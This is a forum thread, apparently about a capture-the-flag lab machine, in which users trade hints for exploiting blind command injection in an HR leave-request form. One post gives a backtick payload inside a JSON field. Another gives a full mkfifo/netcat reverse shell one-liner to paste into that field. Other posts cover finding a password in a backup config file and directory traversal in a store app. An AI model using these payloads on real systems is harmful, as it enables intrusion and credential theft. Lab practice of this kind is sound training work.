Posts: 20 Threads: 0 Joined: N/A October 22, 2022 at 10:11 PM (October 22, 2022, 10:07 PM)GreyEVO Wrote: (October 22, 2022, 10:02 PM)sam123 Wrote: (October 22, 2022, 09:55 PM)GreyEVO Wrote: (October 22, 2022, 09:45 PM)pingu27 Wrote: (October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg
{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}
:(
only one, `[COMMAND]`
why does the backtick work and why does it give us bash command access. I thought since this is a node.js server, it would js commands which is what I have been trying.
nc mkfifo on revshells works well to get a callback tho
cuz whatever you type in is processed server-side by /bin/sh in crontab to add to a csv file gotcha, so you escape hte exec function while i was trying to escape the function that cleans the code from bad chars. thanks Posts: 46 Threads: 0 Joined: N/A October 22, 2022 at 10:24 PM nudge for user bean Posts: 15 Threads: 0 Joined: N/A October 22, 2022 at 11:01 PM how did you get the revshell pls explain Posts: 20 Threads: 0 Joined: N/A October 22, 2022 at 11:03 PM any nudges on the priv esc Posts: 6 Threads: 0 Joined: N/A October 22, 2022 at 11:05 PM (October 22, 2022, 11:01 PM)Enemigosss2 Wrote: how did you get the revshell pls explain on the hr page when you're logged with Christopher account go to leave requests section, in the Reason For leave enter `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT >/tmp/` Posts: 32 Threads: 0 Joined: N/A October 22, 2022 at 11:14 PM (October 22, 2022, 10:36 PM)Hacker2222 Wrote: (October 22, 2022, 10:24 PM)pingu27 Wrote: nudge for user bean
backup file in bean home dir has password in a .config file I can't find the password Posts: 32 Threads: 0 Joined: N/A October 22, 2022 at 11:17 PM (October 22, 2022, 11:15 PM)Hacker2222 Wrote: (October 22, 2022, 11:14 PM)u53r Wrote: (October 22, 2022, 10:36 PM)Hacker2222 Wrote: (October 22, 2022, 10:24 PM)pingu27 Wrote: nudge for user bean
backup file in bean home dir has password in a .config file
I can't find the password
its in .config/xpad/content-XXXXXX ty Posts: 12 Threads: 0 Joined: N/A October 22, 2022 at 11:17 PM in .config/ you can do "grep -ir bean" to find it Posts: 12 Threads: 0 Joined: N/A October 22, 2022 at 11:22 PM (October 22, 2022, 11:22 PM)Hacker2222 Wrote: u can login with admin user and bean password to store so that is prob privesc . source code shows os inject with many filters. any1 got a idea ? doesnt the store runs as www-data? i think you need to lateral into christine then privesc Posts: 74 Threads: 0 Joined: N/A October 22, 2022 at 11:28 PM (October 22, 2022, 11:22 PM)Hacker2222 Wrote: u can login with admin user and bean password to store so that is prob privesc . source code shows os inject with many filters. any1 got a idea ? Yeah, we can create a malicious product and use the add_item functionality to write to files with directory traversal on user parameter, but unfortunately store also runs as www-data. So i think that is a rabbit hole. But strangely it automatically deletes files in product-details, so idk. |
